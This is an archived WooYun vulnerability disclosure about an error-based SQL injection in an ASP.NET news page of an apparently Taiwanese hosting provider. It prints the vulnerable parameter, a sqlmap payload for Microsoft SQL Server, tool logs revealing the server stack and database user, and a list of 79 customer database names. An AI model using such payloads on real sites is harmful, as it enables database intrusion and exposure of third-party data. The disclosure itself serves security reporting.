乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-16: 细节已通知厂商并且等待厂商处理中 2015-12-18: 厂商已经确认,细节仅向厂商公开 2015-12-28: 细节向核心白帽子及相关领域专家公开 2016-01-07: 细节向普通白帽子公开 2016-01-17: 细节向实习白帽子公开 2016-02-01: 细节向公众公开
注入点:
http://**.**.**.**/NewsArticle.aspx?t=42&n=1233&c=27
是个报错注入
Place: GETParameter: c Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clau Payload: t=42&n=1231&c=27 AND 1971=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(1+CHAR(120)+CHAR(58)+(SELECT (CASE WHEN (1971=1971) THEN CHAR(49) ELSE CHAR(48ND))+CHAR(58)+CHAR(119)+CHAR(120)+CHAR(121)+CHAR(58)))---[10:57:14] [INFO] testing Microsoft SQL Server[10:57:14] [INFO] confirming Microsoft SQL Server[10:57:22] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[10:57:22] [INFO] fetching current user[10:57:22] [INFO] retrieved: sinocellcurrent user: 'sinocell'
涉及79裤
available databases [79]:[*] 21shopcomtw[*] albertlannet[*] Americanas[*] angdb[*] Aplan168[*] artbarncorp[*] beautymmcomtw[*] biochiffon[*] cellina[*] cfmw[*] chbookcomtw_bookstore[*] ciaaorgtw[*] cnra[*] darwin178com[*] db1005680_vtp[*] dcdccomtw[*] dgrcomtw[*] digicraftcomtw_[*] dubacotechcom[*] ergocarecomtw[*] ESETRADB[*] eshop[*] fullhouseidcom[*] fulltencomtw[*] gclcomtw[*] GDATA_AntiVirus_ManagementSer[*] GMall[*] goldcarecomtw[*] goodnews[*] grasshillnet[*] greenolicomtw[*] hanorcomtw[*] hohaiyacomtw[*] HollyLuck[*] homesweetycom[*] hwashing_com_tw123[*] jp8comtw[*] **.**.**.**[*] master[*] mobimedia[*] model[*] msdb[*] myharmonicanet_YellowStone[*] netgogocomtw[*] newchicom[*] omroncomtw[*] popsurveycomtw_[*] proth[*] rangecomtw_ShopMall[*] Sinocell[*] sonypicturescomtw[*] soulandcom[*] spacetourscomtw[*] Ss-knifecomtw[*] steercomtw[*] stock88168comtw[*] sunboothcomtw_WebShop[*] sunrayfactory[*] syncmen[*] taitien[*] tempdb[*] template_elate[*] template_elate2014[*] timemask[*] tiplocomtw[*] toastlivingcom[*] travel[*] ubestdigitalcom[*] ultitecprotectioncom[*] UTC_DispWeb_4_Tattoo[*] v-electronicscom[*] vugeyes[*] w007820w[*] w007820w2[*] WANGPIIN[*] water_balance[*] wHLA_SQL[*] x-lurecom[*] yuansun
database management system users [2]:[*] sa[*] sinocell
危害等级:高
漏洞Rank:17
确认时间:2015-12-18 19:08
感謝通報
暂无